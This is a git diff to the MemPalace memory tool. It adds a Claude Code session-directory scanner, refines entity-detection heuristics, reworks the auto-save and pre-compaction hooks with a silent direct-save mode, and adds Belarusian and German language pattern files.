+                    if item.is_file() and item.suffix == ".jsonl":
+                        return True
+            except OSError:
+                pass  # unreadable candidate; keep checking the others
+    return False
+
+
+def _extract_cwd_from_session(session_file: Path) -> Optional[str]:
+    """Return the ``cwd`` from the first record in the header window that has one.
+
+    Only the first MAX_HEADER_LINES lines are examined. Returns None if the file
+    can't be read or no examined line is a JSON object with a non-empty string cwd.
+    """
+    try:
+        with open(session_file, encoding="utf-8", errors="replace") as f:
+            for i, line in enumerate(f):
+                if i >= MAX_HEADER_LINES:
+                    break
+                line = line.strip()
+                if not line:
+                    continue
+                try:
+                    obj = json.loads(line)
+                except json.JSONDecodeError:
+                    continue
+                cwd = obj.get("cwd") if isinstance(obj, dict) else None  # non-object JSON
+                if isinstance(cwd, str) and cwd:
+                    return cwd
+    except OSError:
+        return None
+    return None
+
+
+def _decode_slug_fallback(slug: str) -> str:
+    """Guess a project name from the directory slug when no cwd is available.
+
+    Slugs are lossy (`/` and `-` both become `-`), so the last non-empty
+    dash-separated segment is used; a kebab-case name cannot be recovered
+    without cwd. A slug with no such segment is returned unchanged.
+    """
+    # Leading dashes only produce empty pieces, which the filter drops.
+    tail = next((piece for piece in reversed(slug.split("-")) if piece), None)
+    return slug if tail is None else tail
+
+
+def _safe_mtime(path: Path) -> float:
+    """Return ``path``'s mtime, or 0.0 (sorts as oldest) when stat() raises OSError."""
+    try:
+        return path.stat().st_mtime
+    except OSError:
+        return 0.0
+
+
+def _resolve_project_name(project_dir: Path) -> str:
+    """Recover the original project name from the newest session recording a cwd.
+
+    Falls back to slug-decoding if the dir is unreadable or no session has a cwd.
+    """
+    try:
+        sessions = [p for p in project_dir.iterdir() if p.is_file() and p.suffix == ".jsonl"]
+    except OSError:
+        sessions = []  # listing failed: the slug is all we have to go on
+    # Newest first — most likely to be well-formed.
+    for session in sorted(sessions, key=_safe_mtime, reverse=True):
+        cwd = _extract_cwd_from_session(session)
+        if cwd:
+            return Path(cwd).name or cwd
+    return _decode_slug_fallback(project_dir.name)
+
+
+def scan_claude_projects(path: str | Path) -> list[ProjectInfo]:
+    """Scan a ``.claude/projects/`` directory for Claude Code conversations.
+
+    One ProjectInfo per distinct project name (a name clash keeps the subdir
+    with more sessions). ``has_git`` is False (the directory isn't a repo
+    itself); ``total_commits`` is repurposed as session count for ranking.
+    """
+    root = Path(path).expanduser().resolve()
+    if not is_claude_projects_root(root):
+        return []
+
+    projects: dict[str, ProjectInfo] = {}
+    for sub in sorted(root.iterdir()):
+        if not (sub.is_dir() and sub.name.startswith("-")):
+            continue
+        try:
+            sessions = [p for p in sub.iterdir() if p.is_file() and p.suffix == ".jsonl"]
+        except OSError:
+            continue  # unreadable subdir: skip it
+        if not sessions:
+            continue  # no .jsonl sessions: nothing to report
+
+        name = _resolve_project_name(sub)
+        session_count = len(sessions)
+
+        proj = ProjectInfo(
+            name=name,
+            repo_root=sub,
+            manifest=None,
+            has_git=False,
+            total_commits=session_count,
+            user_commits=session_count,
+            is_mine=True,  # Claude Code sessions are authored by the user
+        )
+        existing = projects.get(name)
+        if existing is None or session_count > existing.user_commits:
+            projects[name] = proj  # ties keep the entry seen first
+
+    return sorted(
+        projects.values(),
+        key=lambda p: (-p.user_commits, p.name),  # most sessions first, then by name
+    )
diff --git a/mempalace/entity_detector.py b/mempalace/entity_detector.py
index 754c65dce..2f2aae481 100644
--- a/mempalace/entity_detector.py
+++ b/mempalace/entity_detector.py
@@ -113,6 +113,23 @@ def _get_stopwords(languages: tuple) -> frozenset:
     ".next",
     "coverage",
     ".mempalace",
+    ".terraform",
+    "vendor",
+    "target",
+}
+
+# Files whose content is boilerplate prose — poisons entity detection.
+# Matched by stem (case-insensitive), with or without an extension.
+SKIP_FILENAMES = {
+    "license",
+    "licence",
+    "copying",
+    "copyright",
+    "notice",
+    "authors",
+    "patents",
+    "third_party_notices",
+    "third-party-notices",
 }
 
 
@@ -193,7 +210,7 @@ def _compile_each(raw_patterns, flags=re.IGNORECASE):
         "person_verbs": _compile_each(sources["person_verb_patterns"]),
         "project_verbs": _compile_each(sources["project_verb_patterns"]),
         "direct": direct_compiled,
-        "versioned": re.compile(rf"\b{n}[-v]\w+", re.IGNORECASE),
+        "versioned": re.compile(rf"\b{n}[-_]v?\d+(?:\.\d+)*\b", re.IGNORECASE),
         "code_ref": re.compile(rf"\b{n}\.(py|js|ts|yaml|yml|json|sh)\b", re.IGNORECASE),
     }
 
@@ -227,12 +244,19 @@ def score_entity(name: str, text: str, lines: list, languages=("en",)) -> dict:
 
     # --- Person signals ---
 
-    # Dialogue markers (strong signal)
+    # Dialogue markers (strong signal).
+    # The bare `^NAME:\s` colon-prefix pattern matches metadata lines like
+    # `Created: 2026-04-21`, so we require >= 2 hits for it to count as dialogue
+    # (real speaker markers repeat; single-line metadata doesn't).
     for rx in patterns["dialogue"]:
         matches = len(rx.findall(text))
-        if matches > 0:
-            person_score += matches * 3
-            person_signals.append(f"dialogue marker ({matches}x)")
+        if matches == 0:
+            continue
+        is_bare_colon = rx.pattern.endswith(r":\s") and not rx.pattern.endswith(r"[:\s]")
+        if is_bare_colon and matches < 2:
+            continue
+        person_score += matches * 3
+        person_signals.append(f"dialogue marker ({matches}x)")
 
     # Person verbs
     for rx in patterns["person_verbs"]:
@@ -328,17 +352,28 @@ def classify_entity(name: str, frequency: int, scores: dict) -> dict:
             signal_categories.add("addressed")
 
     has_two_signal_types = len(signal_categories) >= 2
-    _ = signal_categories - {"pronoun"}  # reserved for future thresholds
+    # Single-category pronoun signal still classifies as person when the
+    # evidence is overwhelming — a diary's main character is referenced
+    # with pronouns, not dialogue markers. Require both: many pronoun hits
+    # AND a high pronoun-to-frequency ratio so common sentence-start words
+    # (Never, Before, etc.) with incidental pronoun proximity don't qualify.
+    pronoun_hits = 0
+    for s in scores["person_signals"]:
+        m = re.search(r"pronoun nearby \((\d+)x\)", s)
+        if m:
+            pronoun_hits = int(m.group(1))
+            break
+    strong_pronoun_signal = pronoun_hits >= 5 and frequency > 0 and pronoun_hits / frequency >= 0.2
 
-    if person_ratio >= 0.7 and has_two_signal_types and ps >= 5:
+    if person_ratio >= 0.7 and (has_two_signal_types and ps >= 5 or strong_pronoun_signal):
         entity_type = "person"
         confidence = min(0.99, 0.5 + person_ratio * 0.5)
         signals = scores["person_signals"] or [f"appears {frequency}x"]
-    elif person_ratio >= 0.7 and (not has_two_signal_types or ps < 5):
-        # Pronoun-only match — downgrade to uncertain
+    elif person_ratio >= 0.7:
+        # Weak single-category person signal — downgrade to uncertain
         entity_type = "uncertain"
         confidence = 0.4
-        signals = scores["person_signals"] + [f"appears {frequency}x — pronoun-only match"]
+        signals = scores["person_signals"] + [f"appears {frequency}x — weak person signal"]
     elif person_ratio <= 0.3:
         entity_type = "project"
         confidence = min(0.99, 0.5 + (1 - person_ratio) * 0.5)
@@ -560,6 +595,8 @@ def scan_for_detection(project_dir: str, max_files: int = 10) -> list:
         dirs[:] = [d for d in dirs if d not in SKIP_DIRS]
         for filename in filenames:
             filepath = Path(root) / filename
+            if filepath.stem.lower() in SKIP_FILENAMES:
+                continue
             ext = filepath.suffix.lower()
             if ext in PROSE_EXTENSIONS:
                 prose_files.append(filepath)
diff --git a/mempalace/hooks_cli.py b/mempalace/hooks_cli.py
index 92184f552..01eca3fb4 100644
--- a/mempalace/hooks_cli.py
+++ b/mempalace/hooks_cli.py
@@ -17,22 +17,54 @@
 SAVE_INTERVAL = 15
 STATE_DIR = Path.home() / ".mempalace" / "hook_state"
 
+
+def _mempalace_python() -> str:
+    """Return the python interpreter that has mempalace installed.
+
+    When hooks are invoked by Claude Code, sys.executable may be the system
+    python which lacks chromadb and other deps.  Resolution order:
+    1. MEMPALACE_PYTHON env var (explicit override)
+    2. Venv python from package install path (only under site-packages/)
+    3. Editable install: venv/ sibling to mempalace/
+    4. sys.executable fallback
+    """
+    # Honor explicit override (used by shell hook wrappers)
+    env_python = os.environ.get("MEMPALACE_PYTHON", "")
+    if env_python and os.path.isfile(env_python) and os.access(env_python, os.X_OK):
+        return env_python
+    parents = Path(__file__).resolve().parents
+    # <venv>/lib/pythonX.Y/site-packages/mempalace/hooks_cli.py: venv root is parents[4]
+    # (parents[3] is <venv>/lib); <project>/mempalace/hooks_cli.py: root is parents[1].
+    candidates = [parents[1] / "venv" / "bin" / "python"]
+    if len(parents) > 4 and parents[1].name == "site-packages":
+        candidates.insert(0, parents[4] / "bin" / "python")
+    for candidate in candidates:
+        if candidate.is_file():
+            return str(candidate)
+    return sys.executable
+
+
+_RECENT_MSG_COUNT = 30  # how many recent user messages to summarize
+
 STOP_BLOCK_REASON = (
     "AUTO-SAVE checkpoint (MemPalace). Save this session's key content:\n"
-    "1. mempalace_diary_write — AAAK-compressed session summary\n"
-    "2. mempalace_add_drawer — verbatim quotes, decisions, code snippets\n"
+    "1. mempalace_diary_write — session summary (what was discussed, "
+    "key decisions, current state of work)\n"
+    "2. mempalace_add_drawer — verbatim quotes, decisions, code snippets "
+    "(place in appropriate wing and room)\n"
     "3. mempalace_kg_add — entity relationships (optional)\n"
-    "Do NOT write to Claude Code's native auto-memory (.md files). "
-    "Continue conversation after saving."
+    "For THIS save, use MemPalace MCP tools only (not auto-memory .md files). "
+    "Use verbatim quotes where possible. Continue conversation after saving."
 )
 
 PRECOMPACT_BLOCK_REASON = (
     "COMPACTION IMMINENT (MemPalace). Save ALL session content before context is lost:\n"
-    "1. mempalace_diary_write — thorough AAAK-compressed session summary\n"
-    "2. mempalace_add_drawer — ALL verbatim quotes, decisions, code, context\n"
+    "1. mempalace_diary_write — thorough session summary\n"
+    "2. mempalace_add_drawer — ALL verbatim quotes, decisions, code, context "
+    "(place each in appropriate wing and room)\n"
     "3. mempalace_kg_add — entity relationships (optional)\n"
-    "Be thorough \u2014 after compaction, detailed context will be lost. "
-    "Do NOT write to Claude Code's native auto-memory (.md files). "
+    "For THIS save, use MemPalace MCP tools only (not auto-memory .md files). "
+    "Be thorough — after compaction this is all that survives. "
     "Save everything to MemPalace, then allow compaction to proceed."
 )
 
@@ -134,8 +166,35 @@ def _log(message: str):
 
 
 def _output(data: dict):
-    """Print JSON to stdout with consistent formatting (pretty-printed)."""
-    print(json.dumps(data, indent=2, ensure_ascii=False))
+    """Print JSON to stdout without importing modules that may redirect streams.
+
+    If mempalace.mcp_server is already loaded, reuse its saved real stdout fd.
+    Otherwise, write directly to fd 1 so hook responses still go to stdout even
+    if sys.stdout has been redirected elsewhere.
+    """
+    payload = (json.dumps(data, indent=2, ensure_ascii=False) + "\n").encode("utf-8")
+
+    real_stdout_fd: int | None = None
+    mcp_mod = sys.modules.get("mempalace.mcp_server") or sys.modules.get(
+        f"{__package__}.mcp_server" if __package__ else "mcp_server"
+    )
+    if mcp_mod is not None:  # only consult a module that is already imported
+        real_stdout_fd = getattr(mcp_mod, "_REAL_STDOUT_FD", None)
+
+    fd = real_stdout_fd if real_stdout_fd is not None else 1
+    offset = 0
+    try:
+        while offset < len(payload):
+            try:
+                offset += os.write(fd, payload[offset:])  # may be a short write
+            except InterruptedError:
+                continue  # interrupted: retry the same slice
+        return  # whole payload written to the raw fd
+    except OSError:
+        pass  # raw write failed; fall back to sys.stdout below
+
+    sys.stdout.buffer.write(payload)  # fallback re-sends the full payload
+    sys.stdout.buffer.flush()
 
 
 def _get_mine_dir(transcript_path: str = "") -> str:
@@ -237,6 +296,182 @@ def _mine_sync(transcript_path: str = ""):
         pass
 
 
+def _desktop_toast(body: str, title: str = "MemPalace"):
+    """Best-effort desktop notification through ``notify-send``.
+
+    Launch failures (OSError) are swallowed so a hook never breaks on them.
+    """
+    argv = ["notify-send", "--app-name=MemPalace", "--icon=brain", title, body]
+    try:
+        subprocess.Popen(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+    except OSError:
+        pass
+
+
+def _extract_recent_messages(transcript_path: str, count: int = _RECENT_MSG_COUNT) -> list[str]:
+    """Return the last ``count`` user messages from a JSONL transcript, each cut to 200 chars."""
+    path = Path(transcript_path).expanduser()
+    if not path.is_file():
+        return []
+    messages = []
+    try:
+        with open(path, encoding="utf-8", errors="replace") as f:
+            for line in f:
+                try:
+                    entry = json.loads(line)
+                    # Claude Code format
+                    msg = entry.get("message") or entry.get("event_message") or {}
+                    if isinstance(msg, dict) and msg.get("role") == "user":
+                        content = msg.get("content", "")
+                        if isinstance(content, list):
+                            content = " ".join(
+                                b.get("text", "") for b in content if isinstance(b, dict)
+                            )
+                        if not isinstance(content, str) or not content.strip():
+                            continue
+                        if "<command-message>" in content or "<system-reminder>" in content:
+                            continue
+                        messages.append(content.strip()[:200])
+                    # Codex CLI format
+                    elif entry.get("type") == "event_msg":
+                        payload = entry.get("payload", {})
+                        if isinstance(payload, dict) and payload.get("type") == "user_message":
+                            text = payload.get("message", "")
+                            if isinstance(text, str) and text.strip():
+                                if "<command-message>" not in text:
+                                    messages.append(text.strip()[:200])
+                except (json.JSONDecodeError, AttributeError, TypeError):
+                    pass  # not JSON, not a record object, or a non-string "text" block
+    except OSError:
+        return []
+    return messages[-count:] if count > 0 else []  # [-0:] would return everything
+
+
+_THEME_STOPWORDS = frozenset(  # English filler words that _extract_themes ignores
+    "the a an and or but in on at to for of is it i me my you your we our "
+    "this that with from by was were be been are not no yes can do did dont "
+    "will would should could have has had lets let just also like so if then "
+    "ok okay sure yeah hey hi here there what when where how why which some "
+    "all any each every about into out up down over after before between "
+    "get got make made need want use used using check look see run try "
+    "know think right now still already really very much more most too "
+    "file files code one two new first last next thing things way well".split()
+)
+
+
+def _extract_themes(messages: list[str], max_themes: int = 3) -> list[str]:
+    """Return up to ``max_themes`` of the most frequent topic words in ``messages``.
+
+    Note: stopword list is English-only; non-English corpora will produce noisy themes.
+    """
+    from collections import Counter
+
+    strip_chars = ".,;:!?\"'`()[]{}#<>/\\-_=+@$%^&*~"
+    tally: Counter[str] = Counter()
+    for text in messages:
+        # Lowercase, split on whitespace, trim punctuation from both ends.
+        for token in (raw.strip(strip_chars) for raw in text.lower().split()):
+            if len(token) >= 4 and token not in _THEME_STOPWORDS and token.isalpha():
+                tally[token] += 1
+    return [word for word, _count in tally.most_common(max_themes)]
+
+
+def _save_diary_direct(
+    transcript_path: str,
+    session_id: str,
+    wing: str = "",
+    toast: bool = False,
+) -> dict:
+    """Write a diary checkpoint by calling the tool function directly (no MCP roundtrip).
+
+    If `wing` is set, the entry lands in that wing (typically the project wing
+    derived from the transcript path). Otherwise falls back to `tool_diary_write`'s
+    default of `wing_session-hook`.
+
+    Returns {"count": N, "themes": [...]} on success, {"count": 0} on failure or no messages.
+    """
+    messages = _extract_recent_messages(transcript_path)
+    if not messages:
+        _log("No recent messages to save")
+        return {"count": 0}
+
+    themes = _extract_themes(messages)
+
+    # Build a compressed diary entry from recent conversation
+    now = datetime.now()
+    topics = "|".join(m[:80] for m in messages[-10:])  # last 10 messages, 80 chars each
+    entry = (
+        f"CHECKPOINT:{now.strftime('%Y-%m-%d')}|session:{session_id}"
+        f"|msgs:{len(messages)}|recent:{topics}"
+    )
+
+    try:
+        from .mcp_server import tool_diary_write  # inside the try: import errors get logged
+
+        result = tool_diary_write(
+            agent_name="session-hook",
+            entry=entry,
+            topic="checkpoint",
+            wing=wing,
+        )
+        if result.get("success"):
+            _log(f"Diary checkpoint saved: {result.get('entry_id', '?')}")
+            # Write state for ack tool to read
+            try:
+                ack_file = STATE_DIR / "last_checkpoint"
+                ack_file.write_text(
+                    json.dumps({"msgs": len(messages), "ts": now.isoformat()}),
+                    encoding="utf-8",
+                )
+            except OSError:
+                pass  # the ack file is best-effort; the save itself succeeded
+            if toast:
+                _desktop_toast(f"Checkpoint saved \u2014 {len(messages)} messages archived")
+            return {"count": len(messages), "themes": themes}
+        else:
+            _log(f"Diary checkpoint failed: {result.get('error', 'unknown')}")
+    except Exception as e:  # any failure is logged and reported as count 0
+        _log(f"Diary checkpoint error: {e}")
+    return {"count": 0}
+
+
+def _ingest_transcript(transcript_path: str):
+    """Launch ``mempalace mine --mode convos --wing sessions`` on the transcript's directory."""
+    path = Path(transcript_path).expanduser()
+    if not path.is_file() or path.stat().st_size < 100:
+        return  # missing or near-empty (<100 bytes) transcript
+
+    from .config import MempalaceConfig
+
+    try:
+        MempalaceConfig()  # validate config loads
+    except Exception:
+        return
+
+    try:
+        log_path = STATE_DIR / "hook.log"
+        STATE_DIR.mkdir(parents=True, exist_ok=True)
+        with open(log_path, "a") as log_f:
+            subprocess.Popen(  # started but not waited on
+                [
+                    _mempalace_python(),
+                    "-m",
+                    "mempalace",
+                    "mine",
+                    str(path.parent),  # the whole directory, not just this file
+                    "--mode",
+                    "convos",
+                    "--wing",
+                    "sessions",
+                ],
+                stdout=log_f,
+                stderr=log_f,
+            )
+        _log(f"Transcript ingest started: {path.name}")
+    except OSError:
+        pass  # best-effort: launch/log-file failures are ignored
+
+
 SUPPORTED_HARNESSES = {"claude-code", "codex"}
 
 
@@ -252,6 +487,39 @@ def _parse_harness_input(data: dict, harness: str) -> dict:
     }
 
 
+def _wing_from_transcript_path(transcript_path: str) -> str:
+    """Map a Claude Code transcript path to the wing name of its project.
+
+    Claude Code names each project folder after the source directory with
+    the path separators turned into dashes, for example:
+        ~/.claude/projects/-home-<user>-Projects-<project>/session.jsonl
+        ~/.claude/projects/-home-<user>-dev-<parent>-<project>/session.jsonl
+        ~/.claude/projects/-Users-<user>-<folder>-<project>/session.jsonl
+
+    The last dash-separated token of that folder name is taken as the
+    project, giving ``wing_<project>`` (lowercased, spaces → ``_``). Paths
+    with neither that layout nor a ``-Projects-<name>`` segment map to
+    ``wing_sessions``.
+    """
+    # Backslashes become slashes so Windows paths match the same patterns.
+    unix_path = transcript_path.replace("\\", "/")
+    # Primary: the encoded folder right under ``.claude/projects/``; its
+    # final dash-separated token is the project directory name.
+    folder = re.search(r"/\.claude/projects/-([^/]+)", unix_path)
+    tail = ""
+    if folder:
+        tail = folder.group(1).rsplit("-", 1)[-1]
+    if tail:
+        return "wing_" + tail.lower().replace(" ", "_")
+    # Legacy fallback: an explicit ``-Projects-<name>`` segment, for
+    # transcripts stored outside the standard Claude Code projects dir.
+    legacy = re.search(r"-Projects-([^/]+?)(?:/|$)", unix_path)
+    if legacy is None:
+        return "wing_sessions"
+    name = legacy.group(1).lower().replace(" ", "_")
+    return "wing_" + name
+
+
 def hook_stop(data: dict, harness: str):
     """Stop hook: block every N messages for auto-save."""
     parsed = _parse_harness_input(data, harness)
@@ -259,10 +527,29 @@ def hook_stop(data: dict, harness: str):
     stop_hook_active = parsed["stop_hook_active"]
     transcript_path = parsed["transcript_path"]
 
-    # If already in a save cycle, let through (infinite-loop prevention)
+    # If already in a block-mode save cycle, let through (infinite-loop prevention).
+    # Silent mode saves directly without returning {"decision":"block"}, so there's
+    # no loop to prevent — and Claude Code's plugin dispatch sets this flag on every
+    # fire after the first, which would otherwise suppress all subsequent auto-saves.
     if str(stop_hook_active).lower() in ("true", "1", "yes"):
-        _output({})
-        return
+        # Safe default: assume silent mode on any config-read failure so saves
+        # proceed rather than being silently dropped. Silent mode is the default
+        # (v3.3.0+), so if we can't read config, behave as if it's still on.
+        silent_guard = True
+        try:
+            from .config import MempalaceConfig
+        except ImportError as exc:
+            _log(
+                f"WARNING: could not import MempalaceConfig for stop guard: {exc}; defaulting to silent mode"
+            )
+        else:
+            try:
+                silent_guard = MempalaceConfig().hook_silent_save
+            except AttributeError as exc:
+                _log(f"WARNING: could not read hook_silent_save: {exc}; defaulting to silent mode")
+        if not silent_guard:
+            _output({})
+            return
 
     # Count human messages
     exchange_count = _count_human_messages(transcript_path)
@@ -282,18 +569,62 @@ def hook_stop(data: dict, harness: str):
     _log(f"Session {session_id}: {exchange_count} exchanges, {since_last} since last save")
 
     if since_last >= SAVE_INTERVAL and exchange_count > 0:
-        # Update last save point
-        try:
-            last_save_file.write_text(str(exchange_count), encoding="utf-8")
-        except OSError:
-            pass
-
         _log(f"TRIGGERING SAVE at exchange {exchange_count}")
 
-        # Optional: auto-ingest if MEMPAL_DIR is set
-        _maybe_auto_ingest(transcript_path)
+        # Read hook settings from config
+        from .config import MempalaceConfig
 
-        _output({"decision": "block", "reason": STOP_BLOCK_REASON})
+        try:
+            config = MempalaceConfig()
+            silent = config.hook_silent_save
+            toast = config.hook_desktop_toast
+        except Exception:
+            silent = True
+            toast = False
+
+        project_wing = _wing_from_transcript_path(transcript_path)
+
+        if silent:
+            # Save directly via Python API — systemMessage renders in terminal
+            result = {"count": 0}
+            if transcript_path:
+                result = _save_diary_direct(
+                    transcript_path, session_id, wing=project_wing, toast=toast
+                )
+                _ingest_transcript(transcript_path)
+            _maybe_auto_ingest(transcript_path)
+            # Only advance save marker after successful save
+            count = result.get("count", 0)
+            if count > 0:
+                try:
+                    last_save_file.write_text(str(exchange_count), encoding="utf-8")
+                except OSError:
+                    pass
+                themes = result.get("themes", [])
+                if themes:
+                    tag = " \u2014 " + ", ".join(themes)
+                else:
+                    tag = ""
+                _output(
+                    {
+                        "systemMessage": f"\u2726 {count} memories woven into the palace{tag}",
+                    }
+                )
+            else:
+                _output({})
+        else:
+            # Legacy: block and ask Claude to save via MCP tools.
+            # Marker advances before confirmed save — best-effort; if Claude
+            # fails to save, the checkpoint is lost but won't retry endlessly.
+            try:
+                last_save_file.write_text(str(exchange_count), encoding="utf-8")
+            except OSError:
+                pass
+            if transcript_path:
+                _ingest_transcript(transcript_path)
+            _maybe_auto_ingest(transcript_path)
+            reason = STOP_BLOCK_REASON + f" Write diary entry to wing={project_wing}."
+            _output({"decision": "block", "reason": reason})
     else:
         _output({})
 
@@ -320,6 +651,10 @@ def hook_precompact(data: dict, harness: str):
 
     _log(f"PRE-COMPACT triggered for session {session_id}")
 
+    # Capture tool output via our normalize path before compaction loses it
+    if transcript_path:
+        _ingest_transcript(transcript_path)
+
     # Mine synchronously so data lands before compaction proceeds
     _mine_sync(transcript_path)
 
diff --git a/mempalace/i18n/be.json b/mempalace/i18n/be.json
new file mode 100644
index 000000000..01e808e85
--- /dev/null
+++ b/mempalace/i18n/be.json
@@ -0,0 +1,166 @@
+{
+  "lang": "be",
+  "label": "Беларуская",
+  "terms": {
+    "palace": "палац",
+    "wing": "крыло",
+    "hall": "зала",
+    "closet": "шафа",
+    "drawer": "шуфляда",
+    "mine": "майнінг",
+    "search": "пошук",
+    "status": "статус",
+    "init": "ініцыялізацыя",
+    "repair": "аднаўленне",
+    "migrate": "міграцыя",
+    "entity": "аб'ект",
+    "topic": "тэма"
+  },
+  "cli": {
+    "mine_start": "Майнінг {path}...",
+    "mine_complete": "Гатова. Створана шаф: {closets}, шуфляд: {drawers}.",
+    "mine_skip": "Майнінг скончаны. Выкарыстайце --force, каб перамайніць.",
+    "search_no_results": "Няма вынікаў для: {query}",
+    "search_results": "Знойдзена {count} вынікаў:",
+    "status_palace": "Палац: {path}",
+    "status_wings": "Крылаў: {count}",
+    "status_closets": "Шаф: {count}",
+    "status_drawers": "Шуфляд: {count}",
+    "init_complete": "Палац ініцыялізаваны ў {path}",
+    "init_exists": "Палац ужо існуе ў {path}",
+    "repair_complete": "Аднаўленне скончана. Выпраўлена праблем: {fixed}.",
+    "migrate_complete": "Міграцыя завершана.",
+    "no_palace": "Палац не знойдзены. Запусціце: mempalace init <дырэкторыя>"
+  },
+  "aaak": {
+    "instruction": "Сцісні да фармату індэкса. Злучкі паміж словамі, вертыкальныя рысы паміж паняткамі. Выдалі прыназоўнікі і службовыя словы. Захавай дакладнасць імёнаў, нумароў, скланенняў і формаў."
+  },
+  "regex": {
+    "topic_pattern": "[А-ЯЁІЎ][а-яёіў]{2,}|[A-Z][a-z]{2,}|[A-Za-z][A-Za-z0-9_]{2,}",
+    "stop_words": "і а але бо каб калі калісьці хоць што хто дзе куды адкуль як чаму таму ж не ні так таксама яшчэ ўжо цяпер потым тут там адсюль туды ў на па з са без для над пад пры пра праз супраць замест акрамя сярод вакол уздоўж каля паміж пасля перад да ад у або альбо то ці быццам нібыта вось гэты гэта гэтыя той тая тыя некаторыя кожны кожная кожныя толькі вельмі можа трэба будзе быў была былі ёсць няма",
+    "quote_pattern": "«\\s*([^»]{10,200})\\s*»|\"([^\"]{10,200})\"",
+    "action_pattern": "(?:зрабіў|зрабіла|зрабілі|стварыў|стварыла|стварылі|дадаў|дадала|дадалі|абнавіў|абнавіла|абнавілі|наладзіў|наладзіла|наладзілі|пратэставаў|пратэставала|пратэставалі)\\s+[\\wа-яёА-ЯЁІіЎў\\s]{3,30}"
+  },
+  "entity": {
+    "candidate_pattern": "[А-ЯЁІЎ][а-яёіў]{1,19}",
+    "multi_word_pattern": "[А-ЯЁІЎ][а-яёіў]+(?:\\s+[А-ЯЁІЎ][а-яёіў]+)+",
+    "person_verb_patterns": [
+      "\\b{name}\\s+сказа(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+спыта(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+адказа(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+расказа(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+засмея(?:ўся|лася|ліся)\\b",
+      "\\b{name}\\s+усміхну(?:ўся|лася|ліся)\\b",
+      "\\b{name}\\s+заплака(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+адчу(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+думае\\b",
+      "\\b{name}\\s+хоча\\b",
+      "\\b{name}\\s+кахае\\b",
+      "\\b{name}\\s+ненавідзіць\\b",
+      "\\b{name}\\s+ведае\\b",
+      "\\b{name}\\s+вырашы(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+напіса(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+каза(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+зрабі(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+спытваецца\\b",
+      "\\b{name}\\s+адказвае\\b"
+    ],
+    "pronoun_patterns": [
+      "\\bён\\b",
+      "\\bяго\\b",
+      "\\bяму\\b",
+      "\\bім\\b",
+      "\\bяна\\b",
+      "\\bяе\\b",
+      "\\bёй\\b",
+      "\\bёю\\b",
+      "\\bяны\\b",
+      "\\bіх\\b",
+      "\\bімі\\b",
+      "\\bяно\\b",
+      "\\bвы\\b",
+      "\\bвас\\b",
+      "\\bвам\\b",
+      "\\bвамі\\b"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:\\s]",
+      "^{name}:\\s",
+      "^\\[{name}\\]",
+      "\"{name}\\s+сказа(?:ў|ла|лі)"
+    ],
+    "direct_address_pattern": "\\bпрывітанне[,:!.]?\\s+{name}\\b|\\bвітаю[,:!.]?\\s+{name}\\b|\\bдзякуй[,:!.]?\\s+{name}\\b|\\bдарагі[,:!.]?\\s+{name}\\b|\\bдарагая[,:!.]?\\s+{name}\\b|\\bпаважаны[,:!.]?\\s+{name}\\b|\\bпаважаная[,:!.]?\\s+{name}\\b",
+    "project_verb_patterns": [
+      "\\bзбіраю\\s+{name}\\b",
+      "\\bсабраў\\s+{name}\\b",
+      "\\bзапускаю\\s+{name}\\b",
+      "\\bзапусціў\\s+{name}\\b",
+      "\\bразгарнуў\\s+{name}\\b",
+      "\\bусталяваў\\s+{name}\\b",
+      "\\bсістэма\\s+{name}\\b",
+      "\\bпраект\\s+{name}\\b",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "і",
+      "ў",
+      "з",
+      "са",
+      "на",
+      "па",
+      "да",
+      "ад",
+      "у",
+      "без",
+      "для",
+      "над",
+      "пад",
+      "пры",
+      "пра",
+      "праз",
+      "супраць",
+      "замест",
+      "акрамя",
+      "сярод",
+      "вакол",
+      "уздоўж",
+      "каля",
+      "паміж",
+      "пасля",
+      "перад",
+      "або",
+      "альбо",
+      "каб",
+      "калі",
+      "хоць",
+      "бо",
+      "ж",
+      "не",
+      "ні",
+      "так",
+      "яшчэ",
+      "ужо",
+      "цяпер",
+      "вось",
+      "гэта",
+      "тое",
+      "тут",
+      "там",
+      "вельмі",
+      "толькі",
+      "можа",
+      "трэба",
+      "ёсць",
+      "няма",
+      "як",
+      "што",
+      "хто",
+      "чаму",
+      "таму",
+      "прывітанне",
+      "дзякуй",
+      "ласка"
+    ]
+  }
+}
diff --git a/mempalace/i18n/de.json b/mempalace/i18n/de.json
index c6677b37d..f2476e119 100644
--- a/mempalace/i18n/de.json
+++ b/mempalace/i18n/de.json
@@ -40,5 +40,87 @@
     "stop_words": "der die das ein eine eines einer einem einen den dem des und oder aber denn weil wenn als ob auch noch schon sehr viel nur nicht mehr kann wird hat ist sind war waren sein haben wurde mit von zu für auf in an um über nach durch",
     "quote_pattern": "\\u201E([^\\u201C]{10,200})\\u201C|\"([^\"]{10,200})\"",
     "action_pattern": "(?:gebaut|behoben|geschrieben|hinzugefügt|gepusht|gemessen|getestet|überprüft|erstellt|gelöscht|aktualisiert|konfiguriert|bereitgestellt|migriert)\\s+[\\wÄÖÜäöüß\\s]{3,30}"
+  },
+  "entity": {
+    "candidate_pattern": "[A-ZÄÖÜ][a-zäöüß]{1,19}",
+    "multi_word_pattern": "[A-ZÄÖÜ][a-zäöüß]+(?:\\s+[A-ZÄÖÜ][a-zäöüß]+)+",
+    "person_verb_patterns": [
+      "\\b{name}\\s+sagte\\b",
+      "\\b{name}\\s+fragte\\b",
+      "\\b{name}\\s+antwortete\\b",
+      "\\b{name}\\s+erzählte\\b",
+      "\\b{name}\\s+lachte\\b",
+      "\\b{name}\\s+lächelte\\b",
+      "\\b{name}\\s+weinte\\b",
+      "\\b{name}\\s+fühlte\\b",
+      "\\b{name}\\s+denkt\\b",
+      "\\b{name}\\s+will\\b",
+      "\\b{name}\\s+liebt\\b",
